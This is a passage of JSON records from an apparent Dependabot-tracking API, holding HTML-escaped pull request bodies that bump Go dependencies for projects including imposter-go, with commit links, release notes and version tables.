href=\"https://github.com/pb33f/libopenapi-validator/commit/1e37fc1d278e0f32bf5eaa70751414b07cd3f99d\"\u003e\u003ccode\u003e1e37fc1\u003c/code\u003e\u003c/a\u003e address \u003ca href=\"https://redirect.github.com/pb33f/libopenapi-validator/issues/191\"\u003e#191\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/07b06ebb04115eb7eb60e78c618572deab5edfd9\"\u003e\u003ccode\u003e07b06eb\u003c/code\u003e\u003c/a\u003e upodated test to be more useful\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/39485c117b6df302dd377572da0db7812a9f7d96\"\u003e\u003ccode\u003e39485c1\u003c/code\u003e\u003c/a\u003e Address \u003ca href=\"https://redirect.github.com/pb33f/libopenapi-validator/issues/247\"\u003epb33f/libopenapi-validator#247\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/39db7ef1bc65feb98a2c75589e37d811fcbc3d44\"\u003e\u003ccode\u003e39db7ef\u003c/code\u003e\u003c/a\u003e address \u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/91\"\u003epb33f/wiretap#91\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/04189e533b6d6bcdb63c0752fd6a35530a0bd322\"\u003e\u003ccode\u003e04189e5\u003c/code\u003e\u003c/a\u003e address issue \u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/146\"\u003epb33f/wiretap#146\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/ce277214ae87e91a8a5d21163811dd75ba91b336\"\u003e\u003ccode\u003ece27721\u003c/code\u003e\u003c/a\u003e Addressing  \u003ca href=\"https://redirect.github.com/pb33f/wiretap/issues/147\"\u003epb33f/wiretap#147\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pb33f/libopenapi-validator/commit/16cd936076a92c4f23aa5975f3a3d2bce2501efd\"\u003e\u003ccode\u003e16cd936\u003c/code\u003e\u003c/a\u003e bump that coverage!\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pb33f/libopenapi-validator/compare/v0.4.7...v0.13.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `golang.org/x/crypto` from 0.41.0 to 0.48.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/e08b06753d6a72f1fe375b6e0fefefb39917c165\"\u003e\u003ccode\u003ee08b067\u003c/code\u003e\u003c/a\u003e go.mod: update golang.org/x dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/7d0074ccc6f17acbf2ebb10db06d492e08f887dc\"\u003e\u003ccode\u003e7d0074c\u003c/code\u003e\u003c/a\u003e scrypt: fix panic on parameters \u0026lt;= 0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/506e022208b864bc3c9c4a416fe56be75d10ad24\"\u003e\u003ccode\u003e506e022\u003c/code\u003e\u003c/a\u003e go.mod: update golang.org/x dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/7dacc380ba001e8fe7c3c7a46bf3cbdaa5064df9\"\u003e\u003ccode\u003e7dacc38\u003c/code\u003e\u003c/a\u003e chacha20poly1305: error out in fips140=only mode\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/19acf81bd7bc7b558d18a550e8e023df2c33e742\"\u003e\u003ccode\u003e19acf81\u003c/code\u003e\u003c/a\u003e go.mod: update golang.org/x dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/3a1c6b4b61966d06b6469ad7bc15839ba76eeb89\"\u003e\u003ccode\u003e3a1c6b4\u003c/code\u003e\u003c/a\u003e x509roots/fallback: update bundle\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/f4602e40409257658159002a9af6aedb875949fb\"\u003e\u003ccode\u003ef4602e4\u003c/code\u003e\u003c/a\u003e ssh/agent: fix flaky test by ensuring a writeable home directory\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/4e0068c0098be10d7025c99ab7c50ce454c1f0f9\"\u003e\u003ccode\u003e4e0068c\u003c/code\u003e\u003c/a\u003e go.mod: update golang.org/x dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/e79546e28b85ea53dd37afe1c4102746ef553b9c\"\u003e\u003ccode\u003ee79546e\u003c/code\u003e\u003c/a\u003e ssh: curb GSSAPI DoS risk by limiting number of specified OIDs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/crypto/commit/f91f7a7c31bf90b39c1de895ad116a2bacc88748\"\u003e\u003ccode\u003ef91f7a7\u003c/code\u003e\u003c/a\u003e ssh/agent: prevent panic on malformed constraint\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/golang/crypto/compare/v0.41.0...v0.48.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-lambda-go` from 1.49.0 to 1.54.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-lambda-go/releases\"\u003egithub.com/aws/aws-lambda-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.54.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAllow ClientContext.Custom unmarshaling for non-string (JSON) values by \u003ca href=\"https://github.com/M-Elsaeed\"\u003e\u003ccode\u003e@​M-Elsaeed\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/620\"\u003eaws/aws-lambda-go#620\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/M-Elsaeed\"\u003e\u003ccode\u003e@​M-Elsaeed\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/620\"\u003eaws/aws-lambda-go#620\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.54.0...v1.53.0\"\u003ehttps://github.com/aws/aws-lambda-go/compare/v1.54.0...v1.53.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.53.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd S3 event optional fields by \u003ca href=\"https://github.com/yhamano0312\"\u003e\u003ccode\u003e@​yhamano0312\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/612\"\u003eaws/aws-lambda-go#612\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate workflows for go 1.26 by \u003ca href=\"https://github.com/bmoffatt\"\u003e\u003ccode\u003e@​bmoffatt\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/617\"\u003eaws/aws-lambda-go#617\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix spelling typos by \u003ca href=\"https://github.com/magnetikonline\"\u003e\u003ccode\u003e@​magnetikonline\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/616\"\u003eaws/aws-lambda-go#616\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for Cognito Inbound federation Lambda trigger by \u003ca href=\"https://github.com/maximrub\"\u003e\u003ccode\u003e@​maximrub\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/619\"\u003eaws/aws-lambda-go#619\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yhamano0312\"\u003e\u003ccode\u003e@​yhamano0312\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/612\"\u003eaws/aws-lambda-go#612\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/magnetikonline\"\u003e\u003ccode\u003e@​magnetikonline\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/616\"\u003eaws/aws-lambda-go#616\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/maximrub\"\u003e\u003ccode\u003e@​maximrub\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/619\"\u003eaws/aws-lambda-go#619\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.53.0...v1.52.0\"\u003ehttps://github.com/aws/aws-lambda-go/compare/v1.53.0...v1.52.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.52.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003elambdacontext\u003c/code\u003e feature: Adding structured logging helper by \u003ca href=\"https://github.com/anzheyazzz\"\u003e\u003ccode\u003e@​anzheyazzz\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/614\"\u003eaws/aws-lambda-go#614\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anzheyazzz\"\u003e\u003ccode\u003e@​anzheyazzz\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/614\"\u003eaws/aws-lambda-go#614\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.51.2...v1.52.0\"\u003ehttps://github.com/aws/aws-lambda-go/compare/v1.51.2...v1.52.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.51.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: always return PhysicalResourceID for CFn CustomResources by \u003ca href=\"https://github.com/Youssef-Beltagy\"\u003e\u003ccode\u003e@​Youssef-Beltagy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/613\"\u003eaws/aws-lambda-go#613\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Youssef-Beltagy\"\u003e\u003ccode\u003e@​Youssef-Beltagy\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/613\"\u003eaws/aws-lambda-go#613\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.51.1...v1.51.2\"\u003ehttps://github.com/aws/aws-lambda-go/compare/v1.51.1...v1.51.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.51.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003edocumentation rework by \u003ca href=\"https://github.com/bmoffatt\"\u003e\u003ccode\u003e@​bmoffatt\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/608\"\u003eaws/aws-lambda-go#608\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.51.0...v1.51.1\"\u003ehttps://github.com/aws/aws-lambda-go/compare/v1.51.0...v1.51.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.51.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/ca19f6ff85c6e7e87430d86d98d64a2d461dbabf\"\u003e\u003ccode\u003eca19f6f\u003c/code\u003e\u003c/a\u003e Allow ClientContext.Custom unmarshaling for non-string (JSON) values (\u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/620\"\u003e#620\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/9c32960087517ddf57e3d405fae5e8e5e730f4cc\"\u003e\u003ccode\u003e9c32960\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/619\"\u003e#619\u003c/a\u003e from maximrub/inbound-federation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/ebe38d988fd6f254f2c818c1bd12e15df52577f3\"\u003e\u003ccode\u003eebe38d9\u003c/code\u003e\u003c/a\u003e add support for Cognito Inbound federation Lambda trigger\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/71624ac50ffdcb73bce436c791caadfb468a8abc\"\u003e\u003ccode\u003e71624ac\u003c/code\u003e\u003c/a\u003e Fix spelling typos (\u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/616\"\u003e#616\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/33e4dc3007f6898e4031ac3b04520a21c0a4fb8c\"\u003e\u003ccode\u003e33e4dc3\u003c/code\u003e\u003c/a\u003e Update workflows for go 1.26 (\u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/617\"\u003e#617\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/e1cb4611fc8ef22a40196b19651a33487b846a01\"\u003e\u003ccode\u003ee1cb461\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/612\"\u003e#612\u003c/a\u003e from yhamano0312/feat/add-s3-event-fields\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/a66ce2dc84f235c83f927524f218a106aa3f0c93\"\u003e\u003ccode\u003ea66ce2d\u003c/code\u003e\u003c/a\u003e Merge branch 'main' into feat/add-s3-event-fields\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/9dac8a59d3d97d63314ac5ffc7d12475eaa0a76a\"\u003e\u003ccode\u003e9dac8a5\u003c/code\u003e\u003c/a\u003e Add structured logging helper (\u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/614\"\u003e#614\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/6252f73f51494b482a1ff1b21b84bb764add35b2\"\u003e\u003ccode\u003e6252f73\u003c/code\u003e\u003c/a\u003e fix: always return PhysicalResourceID for CFn CustomResources (\u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/613\"\u003e#613\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/be52e48b133401d28c9f19b746989c4f1458b816\"\u003e\u003ccode\u003ebe52e48\u003c/code\u003e\u003c/a\u003e feat: add lifecycle event data structure and corresponding test for S3 events\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.49.0...v1.54.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go` from 1.55.7 to 1.55.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.55.7...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `golang.org/x/net` from 0.42.0 to 0.50.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/ebddb99633e0fc35d135f62e9400678492c1d3be\"\u003e\u003ccode\u003eebddb99\u003c/code\u003e\u003c/a\u003e go.mod: update golang.org/x dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/4a490d4f5331699af2b0987af2e4cea9925f65af\"\u003e\u003ccode\u003e4a490d4\u003c/code\u003e\u003c/a\u003e internal/http3: add Expect: 100-continue support to ClientConn\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/73fe7011adb0a690693f0318325c60d477c7bb3a\"\u003e\u003ccode\u003e73fe701\u003c/code\u003e\u003c/a\u003e internal/http3: add Expect: 100-continue support to Server\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/af0c9df79dbe35108ead105e4ca28133551e4d1a\"\u003e\u003ccode\u003eaf0c9df\u003c/code\u003e\u003c/a\u003e html: add NodeType.String() method\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/e02fb33933734f5c17f8474ef9f54461e776d119\"\u003e\u003ccode\u003ee02fb33\u003c/code\u003e\u003c/a\u003e internal/http3: make responseWriter.Flush write headers if not done yet\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/da558ff100e05eb3fd3c94d2f978c062edc070a2\"\u003e\u003ccode\u003eda558ff\u003c/code\u003e\u003c/a\u003e internal/http3: ensure bodyReader cannot be read after being closed\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/d7c76faf077586c8657a8bdd404484c090764e2b\"\u003e\u003ccode\u003ed7c76fa\u003c/code\u003e\u003c/a\u003e internal/http3: make responseWriter behave closer to other http.ResponseWriter\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/64b3af9625ad94ce3f68ac1ab80733f691a49319\"\u003e\u003ccode\u003e64b3af9\u003c/code\u003e\u003c/a\u003e http2: prevent transport deadlock due to WINDOW_UPDATE that exceeds limit\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/1973e8da2d578cd964f4c1df41ed8c553f1e17b7\"\u003e\u003ccode\u003e1973e8d\u003c/code\u003e\u003c/a\u003e internal/http3: add Server support for handling HEAD requests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/57ea86db083ff804aa7dfca3489c0f965ab3b0da\"\u003e\u003ccode\u003e57ea86d\u003c/code\u003e\u003c/a\u003e icmp, internal/socket, ipv4, ipv6: use binary.NativeEndian\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/golang/net/compare/v0.42.0...v0.50.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e","html_url":"https://github.com/imposter-project/imposter-go/pull/53","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/imposter-project%2Fimposter-go/issues/53","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/53/packages"},{"uuid":"4174607992","node_id":"PR_kwDOCdvj-c7Ox7b9","number":7873,"state":"closed","title":"dev: bump the safe group across 1 directory with 40 updates","user":"dependabot[bot]","labels":["dependencies","go"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-04-06T22:55:21.000Z","author_association":null,"state_reason":null,"created_at":"2026-03-30T23:13:58.000Z","updated_at":"2026-04-06T22:55:23.000Z","time_to_close":603683,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"dev: bump","group_name":"safe","update_count":40,"packages":[{"name":"github.com/KimMachineGun/automemlimit","old_version":"0.7.4","new_version":"0.7.5","repository_url":"https://github.com/KimMachineGun/automemlimit"},{"name":"github.com/aws/aws-sdk-go","old_version":"1.55.7","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"},{"name":"github.com/aws/aws-sdk-go-v2/config","old_version":"1.29.12","new_version":"1.32.13","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/s3","old_version":"1.78.2","new_version":"1.97.3","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/coder/websocket","old_version":"1.8.13","new_version":"1.8.14","repository_url":"https://github.com/coder/websocket"},{"name":"github.com/eclipse/paho.mqtt.golang","old_version":"1.5.0","new_version":"1.5.1","repository_url":"https://github.com/eclipse/paho.mqtt.golang"},{"name":"github.com/emersion/go-smtp","old_version":"0.22.0","new_version":"0.24.0","repository_url":"https://github.com/emersion/go-smtp"},{"name":"github.com/envoyproxy/protoc-gen-validate","old_version":"1.2.1","new_version":"1.3.3","repository_url":"https://github.com/envoyproxy/protoc-gen-validate"},{"name":"github.com/getsentry/sentry-go","old_version":"0.34.1","new_version":"0.44.1","repository_url":"https://github.com/getsentry/sentry-go"},{"name":"github.com/jackc/pgx/v5","old_version":"5.7.5","new_version":"5.9.1","repository_url":"https://github.com/jackc/pgx"},{"name":"github.com/jarcoal/httpmock","old_version":"1.4.0","new_version":"1.4.1","repository_url":"https://github.com/jarcoal/httpmock"},{"name":"github.com/klauspost/compress","old_version":"1.18.0","new_version":"1.18.5","repository_url":"https://github.com/klauspost/compress"},{"name":"github.com/lib/pq","old_version":"1.10.9","new_version":"1.12.1","repository_url":"https://github.com/lib/pq"},{"name":"github.com/nats-io/nats-server/v2","old_version":"2.11.4","new_version":"2.12.6","repository_url":"https://github.com/nats-io/nats-server"},{"name":"github.com/prometheus/client_golang","old_version":"1.22.0","new_version":"1.23.2","repository_url":"https://github.com/prometheus/client_golang"},{"name":"github.com/redis/go-redis/v9","old_version":"9.11.0","new_version":"9.18.0","repository_url":"https://github.com/redis/go-redis"},{"name":"github.com/spf13/cast","old_version":"1.9.2","new_version":"1.10.0","repository_url":"https://github.com/spf13/cast"},{"name":"github.com/spf13/cobra","old_version":"1.9.1","new_version":"1.10.2","repository_url":"https://github.com/spf13/cobra"},{"name":"github.com/spf13/viper","old_version":"1.20.1","new_version":"1.21.0","repository_url":"https://github.com/spf13/viper"},{"name":"github.com/throttled/throttled/v2","old_version":"2.13.0","new_version":"2.15.0","repository_url":"https://github.com/throttled/throttled"},{"name":"github.com/uptrace/bun","old_version":"1.2.14","new_version":"1.2.18","repository_url":"https://github.com/uptrace/bun"},{"name":"github.com/uptrace/bun/dialect/pgdialect","old_version":"1.2.14","new_version":"1.2.18","repository_url":"https://github.com/uptrace/bun"},{"name":"github.com/uptrace/bun/driver/pgdriver","old_version":"1.2.14","new_version":"1.2.18","repository_url":"https://github.com/uptrace/bun"},{"name":"go.opentelemetry.io/contrib/instrumentation/github.com/gorilla/mux/otelmux","old_version":"0.62.0","new_version":"0.67.0","repository_url":"https://github.com/open-telemetry/opentelemetry-go-contrib"},{"name":"go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc","old_version":"0.62.0","new_version":"0.67.0","repository_url":"https://github.com/open-telemetry/opentelemetry-go-contrib"},{"name":"go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp","old_version":"0.62.0","new_version":"0.67.0","repository_url":"https://github.com/open-telemetry/opentelemetry-go-contrib"},{"name":"go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracegrpc","old_version":"1.37.0","new_version":"1.42.0","repository_url":"https://github.com/open-telemetry/opentelemetry-go"},{"name":"go.thethings.network/lorawan-stack-legacy/v2","old_version":"2.1.0","new_version":"2.1.1","repository_url":"https://github.com/TheThingsNetwork/lorawan-stack"},{"name":"go.uber.org/zap","old_version":"1.27.0","new_version":"1.27.1","repository_url":"https://github.com/uber-go/zap"},{"name":"golang.org/x/oauth2","old_version":"0.35.0","new_version":"0.36.0","repository_url":"https://github.com/golang/oauth2"}],"path":null,"ecosystem":"go"},"body":"Bumps the safe group with 30 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/KimMachineGun/automemlimit](https://github.com/KimMachineGun/automemlimit) | `0.7.4` | `0.7.5` |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.55.7` | `1.55.8` |\n| [github.com/aws/aws-sdk-go-v2/config](https://github.com/aws/aws-sdk-go-v2) | `1.29.12` | `1.32.13` |\n| [github.com/aws/aws-sdk-go-v2/service/s3](https://github.com/aws/aws-sdk-go-v2) | `1.78.2` | `1.97.3` |\n| [github.com/coder/websocket](https://github.com/coder/websocket) | `1.8.13` | `1.8.14` |\n| [github.com/eclipse/paho.mqtt.golang](https://github.com/eclipse/paho.mqtt.golang) | `1.5.0` | `1.5.1` |\n| [github.com/emersion/go-smtp](https://github.com/emersion/go-smtp) | `0.22.0` | `0.24.0` |\n| [github.com/envoyproxy/protoc-gen-validate](https://github.com/envoyproxy/protoc-gen-validate) | `1.2.1` | `1.3.3` |\n| [github.com/getsentry/sentry-go](https://github.com/getsentry/sentry-go) | `0.34.1` | `0.44.1` |\n| [github.com/jackc/pgx/v5](https://github.com/jackc/pgx) | `5.7.5` | `5.9.1` |\n| [github.com/jarcoal/httpmock](https://github.com/jarcoal/httpmock) | `1.4.0` | `1.4.1` 